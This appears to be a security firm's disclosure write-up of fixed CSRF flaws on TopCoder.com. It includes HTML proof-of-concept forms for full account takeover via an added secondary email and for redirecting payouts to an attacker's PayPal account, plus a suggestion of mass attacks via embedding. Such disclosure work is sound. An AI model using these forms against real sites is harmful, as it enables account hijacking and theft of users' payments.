TopCoder.com Vulnerabilities – A tail of site-wide bugs leads to accounts compromise & payments hijacking
TopCode.com is a website where the most skilled top coders around the world are solving challenges, Competing and writing codes to achieve a specific tasks. Top high profile companies like (Facebook, Google, Twitter, etc..) are getting help from such websites in their recruitment process!
Topcoder is a company that administers contests in computer programming. Topcoder hosts fortnightly online competitive programming competitions—known as SRMs or “single round matches”—as well as weekly competitions in graphic design and development. The work in design and development produces useful software which is licensed for profit by Topcoder.
TopCoder’s Business Model
Topcoder sells software licenses to use the growing body of components that have been developed in competition and also acts as an outsourcing center, allowing companies to farm out custom design and development tasks to Topcoder competitors. Competitors involved in the creation of these components are paid royalties based on these sales.
The software resulting from algorithm competitions—and the less-frequent marathon matches—is not usually directly useful, but sponsor companies sometimes provide money to pay the victors. Statistics (including an overall “rating” for each developer) are tracked over time for competitors in each category.
A BIG NOTE
We at Seekurity are not supporting/encouraging any form of random bugs/vulnerability testing on websites/services/apps that don’t have a clear responsible disclosure rules. To be more clear, we (@Seekurity) and (@TopCoder) agreed on doing such testing!
Back to May, 2015 Seekurity team was responsibly reported a site-wide CSRF vulnerabilities which *if maliciously used* will lead to full user accounts compromise and payment hijacking issues!
1. First scenario “Full Account Compromise”
The PoC code is:
<h1>TopCoder Full Account Takeover CSRF by @Seekurity</h1>
<input type=”hidden” name=”module” value=”AddSecondEmail” />
<input type=”hidden” name=”em” value=”symbiansymoh@
<input type=”submit” value=”One click Hijack” />
This form submit will result adding this email “firstname.lastname@example.org” as a secondary email to the victim’s TopCoder account after that attackers can initiate a password reset procedures, get password reset link of the secondary email, change victim’s password and the account is theirs.
2. Second Scenario “Payment Hijack”
The PoC code is:
TopCoder.com Payment Hijack CSRF (All your money belongs to us) by @Seekurity</br>
<form action=”https://community.topcoder.com/tc” method=”POST”>
<input type=”hidden” name=”module” value=”EditPaymentPreferences” />
<input type=”hidden” name=”accrualAmount” value=”25″ />
<input type=”hidden” name=”paymentMethod” value=”2″ />
<input type=”hidden” name=”paypalAccount” value=”email@example.com” />
<input type=”submit” value=”Hijack My Money” />
This form submit will result in linking a Paypal email account in addition to accrual amount of money to be automatically withdrawn after reaching that limit, This scenario is more critical than the takeover accounts one since you can initiate payment account linking in bulk but for the taking over scenario you need a unique email for each account takeover process since labeled emails trick (eg. attacker+[Random]@gmail.com) won’t work here!
A Highlight on discovered issues
As you may notice these two critical form actions are not protected by an anti-csrf token which means we can CSRF any TopCoder’s users and hijack his account with just a one click (Targeted attacks) or via randomly mass attacks (embedding the PoC code in a famous websites and bingo). Hackers can hijack any user accounts or change the payment infos and bob is their uncle!
Seems like everyone is caring about developing without seeing the potential of a security issue!
The issues has been fixed now by adding a site-wide anti-csrf tokens protecting sensitive form submits against such attacks.
Thanks for reading!
Building a website? Or already built a one? Think twice before going public and let us protect your business!